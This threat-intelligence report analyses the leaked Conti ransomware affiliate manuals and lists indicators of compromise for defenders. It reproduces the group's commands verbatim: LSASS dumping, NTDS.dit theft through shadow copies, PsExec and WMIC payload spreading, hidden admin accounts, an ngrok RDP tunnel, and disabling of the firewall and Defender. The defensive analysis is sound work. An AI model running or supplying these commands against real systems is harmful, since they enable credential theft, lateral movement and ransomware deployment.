Believed active since mid-2020, Conti is a big game hunter ransomware threat operated by a threat group identified as Wizard Spider and offer to affiliates as a ransomware-as-a-service (RaaS) offering.
Following the lead of other big game hunter ransomware groups, Conti adopted the double extortion tactic, also known as 'steal, encrypt and leak', in order to apply additional pressure on victims to pay their ransom demands and avoid sensitive or confidential data being exposed.
Infamously responsible for a large-scale ransomware attack on the Irish Health Service Executive (HSE), a disgruntled Conti affiliate leaked an archive containing internal 'manuals and software', as utilized by the group, on August 5, 2021 to a popular Russian-language cybercrime forum (Figure 1/Figure 2).
Figure 1 - Forum post detailing the Conti leak
Figure 2 - Google Translation (Russian to English)
Seemingly upset at not receiving a cut of the profits, this leaked archive provides an insight into the tools, techniques and procedures (TTP) of the group and their affiliates, likely similar to TTP utilized by other ransomware threat groups.
Later posts to this forum thread suggest that some attack tools were excluded from this leak including a Mimikatz payload, used to evade antivirus solutions, and a 'stealer' payload, used to acquire credentials from browsers.
Additionally, the affiliate claims to hold information pertaining to the development of targets and a list of 'teams' although it is not clear if this list would expose high-ranking members of the Conti/Wizard Spider threat group.
Having reviewed this leak archive, the content appears authentic and, as such, the TTP are likely to be in current use by Conti as well as potentially other ransomware groups using similar methods.
This report provides a summary of indicators of compromise (IOC) identified from this analysis to allow defenders an opportunity to hunt for these threats within their organization's network as well as proactively block or identify future intrusion attempts.
Payloads & Tools
Whilst some of the tools utilized by Conti are 'legitimate' commercial or open-source offerings, their unexpected presence and/or execution on an organization's network may be indicative of nefarious use and should be investigated.
AdFind  is a free Active Directory (AD) query tool used to gather information such as hosts and users, likely during the threat actor's reconnaissance phase, from the target network.
Aside from identifying additional hosts to target, the threat actor will attempt to determine high-value users from the information acquired using AdFind.
Specifically, documentation within the leak reveals that Conti defines users as being either 'Junior', 'Medium' or 'Senior' with the group obviously seeking to identify high privilege 'Senior' accounts with higher privileges. Furthermore, suggested departments of interest include those mentioning 'Administration', 'IT' and/or 'LAN Engineering'.
In addition to the use of AdFind, which does not necessarily require administrative privileges to execute, the group will also use native commands such as:
NET GROUP "DOMAIN ADMINS" / DOMAIN
Notably, execution of the
backup.bat script results in the following text files, containing AD information from a victim network, being created:
Additional scripts are also included within the leak with
script.sh seemingly being used to parse AdFind results:
The output of this additional script includes the following text files:
Whilst a script named
p.bat may be used to 'ping' discovered hosts to determine if they are online:
Notably this script will read the content of
domains.txt and output results to
Antivirus Removal Tools
Albeit contained within a password-protected 7zip archive, a number of executables and scripts are seemingly provided to remove endpoint security solutions:
- Bitdefender 2019 Editions 
- Trend Micro 
trendmicro pass AV remove.bat
- Sophos 
Additionally, this archive includes rootkit removal tools, potentially used to prevent third-party rootkits from impacting the group's activity:
- GMER Rootkit Detector and Remover 
- Epoolsoft PC Hunter
- PowerTool Antivirus & Rootkit Tool 
Whilst specific file hashes for the above files cannot be determined from the encrypted archive, those deploying the tools may drop the entire archive onto a target host:
3 # AV.7z
Cobalt Strike , is a legitimate commercial tool often used by red teams to provide a post-exploitation implant, named ‘Beacon’.
Typically delivered and reflectively loaded into the memory of an injected Windows process following the exploitation of some vulnerability, Cobalt Strike evades detection and provides numerous capabilities to a threat actor including command execution, file transfer, keylogging, Mimikatz credential gathering, port scanning, privilege escalation and SOCKS proxying.
Command and control (C2) communications utilize common protocols, including HTTP, HTTPS and DNS, likely to avoid anomaly detection by appearing alongside other legitimate network communications and, once deployed, the Beacon will attempt to periodically call home to a preconfigured C2 server.
The main Cobalt Strike archive includes the following files, many of which may also identify the presence of earlier versions of Cobalt Strike:
Additionally, a Cobalt Strike script used to query the Windows Registry for signs of antivirus software being installed may also be deployed:
C2 IP Addresses
Based on screenshots shared by the rogue affiliate, the following IP addresses were potentially previously used as Cobalt Strike command and control (C2) infrastructure:
Kerberoast  is a Kerberos attack technique that allows an unprivileged user to gain access to service accounts by cracking NTLM hashes acquired from ticket-granting tickets (TGT) in memory. Brute-forcing these HTLM hashes can allow a plaintext password to be determined leading to privilege escalation.
In this instance, a PowerShell script from the Empire Project  has been deployed for 'Kerberoasting'.
Proxifier  is a commercial tool that allows non-proxy aware applications to proxy their network traffic through a SOCKS or HTTPS proxy.
Rclone  is a legitimate open source tool used to synchronize and manage data on local, cloud and virtual file systems, seemingly used by the group for data exfiltration via the Mega.nz cloud storage platform.
Instructions provided to the affiliate detail how to copy data from victim hosts to a Mega cloud storage account and detail the use of a PowerShell script to process multiple network shares.
Launching the PowerShell script
rclonemanager.ps1, a list of network shares is read from a file named
2load.txt and used with Rclone which is executed in multi-threading mode. Additionally, the configuration file
rclone.conf contains credentials for a threat actor controlled Mega account into which the data is uploaded.
Router Scan by Stas'M  is a network audit tool used to identify devices and, using various exploits, gather data from network infrastructure devices.
Given the use of exploits, endpoint security solutions will likely identify this tool as malicious.
In addition to the identified binaries, 'manuals' within this leak identify the use of numerous native Windows and third-party tools. As such, the unexpected execution of the following commands may be indicative of nefarious activity.
Presumably acting as an additional method of remote access, a manual within the leak suggests the use of the commercial remote access tool AnyDesk  to allow the threat actor to browse the file system of victim hosts as well as potentially delivering additional payloads and/or exfiltrating data.
To simplify the use of AnyDesk, an example PowerShell script is provided that downloads the AnyDesk executable to
C:\ProgramData\AnyDesk (Figure 3).
Figure 3 - Example PowerShell script used to download AnyDesk
Once downloaded, AnyDesk is then silently installed and an access password configured:
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
As observed in the group's Remote Desktop configuration, an additional administrator account may also be configured, albeit likely using different values, along with hiding this account from the login screen by creating or modifying the
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
Finally, AnyDesk is executed with the
--get-id parameter that is required by the threat actor to gain remote access:
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
Conti Encryption Tool
Whilst the actual encryption tool is not included within the leak, documentation for the Linux version, potentially named
encryptor, provides details of the tool's options including VMware ESXi capabilities:
- Encrypts files on the specified path. There will be no mandatory parameter without it.
- Kills all processes that interfere with file open operations.
- Logs all activity including errors.
- Turns off all VMware ESXi virtual machines.
- Used with the
--vmkilleroption, specifies VMware EXSi virtual machines that will not be turned off.
- Used with the
- Detaches the encryption process from the current terminal session so that it continues to run should the session fail.
As detailed in the rogue affiliate's forum post, the Mimikatz attack tool was excluded from this leak although details of the group's credential dumping methods are within the leaked manuals.
Specifically, the following commands are given as methods for creating a memory dump of the Local Security Authority Subsystem Service (LSASS) for later analysis and credential theft:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"
remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
Whilst not present within this leak, SoftPerfect Network Scanner  is a commercial network administration tool available for both macOS and Windows.
Based on the manuals within this leak, this tool is used to gather information on hosts within a target network:
netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255
It is likely that this tool would be deployed in its 'portable' format, rather than installed, along with the above specified XML files. As such, the following files may be present:
Widely used by developers, ngrok  is a legitimate service that allows the creation of a secure tunnels that provide remote access to hosts within private networks, such as those behind firewalls and/or Network Address Translation (NAT).
Assuming the 'free plan' is used, execution of ngrok on a target host results in a randomly generated temporary
ngrok.io address being created to allow remote access via a secure HTTP/TCP tunnel.
Aside from nefarious use by threat actors, unauthorized tunnels should be discouraged given that they can bypass security controls and increase the attack surface of the organization.
In this instance, ngrok is used by the threat actor to simplify access to Remote Desktop services on Windows hosts, as determined by TCP port 3389, although in practice these parameters may vary:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
ngrok tcp 3389
The NT Directory Services Directory Information Tree file, located in
%WINDOWS%\NTDS.dit, acts as a database for Active Directory and contains valuable data including credentials.
As such, threat actors seeking to elevate their privileges within a network will attempt to acquire this file, although it is locked by default.
To work around this issue, Conti detail the use of the Windows Management Interface command-line utility (WMIC) and the Volume Shadow Service (VSS) administrative tool to create a Volume Shadow Copy of the system:
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"
net start Volume Shadow Copy
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
Having created the shadow copy, the NTDS file and potentially sensitive Windows Registry hive files, can be copied to another location for exfiltration:
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\"
HarddiskVolumeShadowCopyXX number will differ based on the number of shadow copies present on the target host.
Subsequently, the guide recommends the creation of an encrypted archive containing these files, likely as these may prove useful in later intrusions:
7za.exe a -tzip -mx5 \\<DOMAIN_CONTROLLER>\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD
Finally, given that the NTDS file was open during the backup process, the Extensible Storage Engine (ESE) utility is executed to repair any potential corruption:
Esentutl /p C:\log\ntds.dit
Notably, the tool used to extract credentials from the NTDS file is not specified.
To allow a payload to be copied across a victim network, manuals within this leak detail the use of the legitimate Microsoft Sysinternals tool PsExec , used to execute programs on remote hosts, along with the suggested use of batch scripts:
PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\<DOMAIN_CONTROLLER>\share$\fx166.exe" "C:\windows\temp\"
- Uses PsExec to execute the
COPYcommand on each of the hosts specified in the file
@C:\share$\comps1.txtresulting in the payload
fx166.exebeing copied from a specified domain controller to each host's temporary directory.
PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
- Uses PsExec to remotely execute using the copied executable payload,
fx166.exe, on each of the hosts specified in the file
Alternatively, the Windows Management Interface command-line utility (WMIC) can be used to achieve the same outcome along with the Background Intelligent Transfer Service administrative tools (BITS Admin) to deliver the executable payload:
wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\<DOMAIN_CONTROLLER>\share$\fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe"
Using the native Windows Registry command line utility,
reg.exe, Remote Desktop is enabled by creating or overwriting the
fDenyTSConnections key with
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Additionally, Remote Assistance is enabled by creating or overwriting the
fAllowToGetHelp key with
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
Having made the Windows Registry changes, the Windows Firewall is reconfigured using the Network Shell utility,
netsh, to enable Remote Desktop traffic:
netsh Advfirewall set allprofiles state off
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh firewall set service type = remotedesktop mode = enable
Presumably if the standard Remote Desktop port is blocked, the following PowerShell commands are provided to reconfigure the Windows Firewall, update and then restart the Remote Desktop service, either preceded by
powershell.exe or directly executed within a PowerShell console:
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350
Restart-Service termservice -force
Finally, the threat actor may create an additional administrative user using the
net management command, albeit the username and password may vary in practice:
net user Admin Password1 /add
net localgroup Administrators Admin /add
Presumably used as part of a reconnaissance phase, the legitimate Microsoft SQL command-line utility is used to query any databases present on a host and then potentially dump data from them to file.
As such, any unexpected execution of
sqlcmd.exe on a Microsoft SQL server should be reviewed, for example:
sqlcmd.exe -S localhost -Q "select loginame, hostname from sys.sysprocesses"
sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
As is common with many threat actors, the Windows Task Scheduler utility,
schtasks.exe, can be abused to launch processes using the permissions of a specified user account, specified by the
/RU parameter, on a remote IP address or hostname, specified by the
Based on the examples observed within this leak, suspicious usage includes tasks that are created, started immediately using the
/run parameter and deleted in quick succession, for example:
SCHTASKS /s <IP|HOSTNAME> /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
SCHTASKS /s <IP|HOSTNAME> /run /TN "WindowsSensor15"
schtasks /S <IP|HOSTNAME> /TN "WindowsSensor15" /DELETE /F
It is also likely that both the executable name and path would vary along with the task name, as specified by the
As is common with many ransomware campaigns, and likely used in addition to the antivirus removal tools, Windows Defender is disabled via PowerShell, either preceded by
powershell.exe or directly executed within a PowerShell console:
Set-MpPreference -DisableRealtimeMonitoring $true
Whilst not explicitly mentioned in this leak, the following PowerShell commands are often used by threat actors to further reduce the effectiveness of Windows Defender:
- Disable the Intrusion Prevention System (IPS), used to protect against the exploitation of known vulnerabilities:
Set-MpPreference -DisableIntrusionPreventionSystem $true
- Prevent downloaded files and attachments from being scanned:
Set-MpPreference -DisableIOAVProtection $true
- Disable the scanning of scripts:
Set-MpPreference -DisableScriptScanning $true
- Disable ransomware protection:
Set-MpPreference -EnableControlledFolderAccess Disabled
- Prevent malicious samples from being shared with Microsoft:
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -SubmitSamplesConsent NeverSend